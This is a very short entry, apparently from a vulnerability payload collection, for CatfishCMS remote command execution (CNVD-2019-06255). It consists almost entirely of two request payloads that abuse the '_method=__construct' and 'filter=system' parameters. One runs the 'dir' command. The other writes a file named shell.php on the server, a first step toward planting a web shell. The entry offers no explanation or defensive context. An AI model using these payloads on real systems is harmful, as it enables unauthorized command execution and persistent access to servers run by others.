CNVD-2019-06255 CatfishCMS远程命令执行漏洞/zh-tw

Payload

s=dir&_method=__construct&method=*&filter=system

s=echo "shell" >shell.php&filter=system&method=*&_method=__construct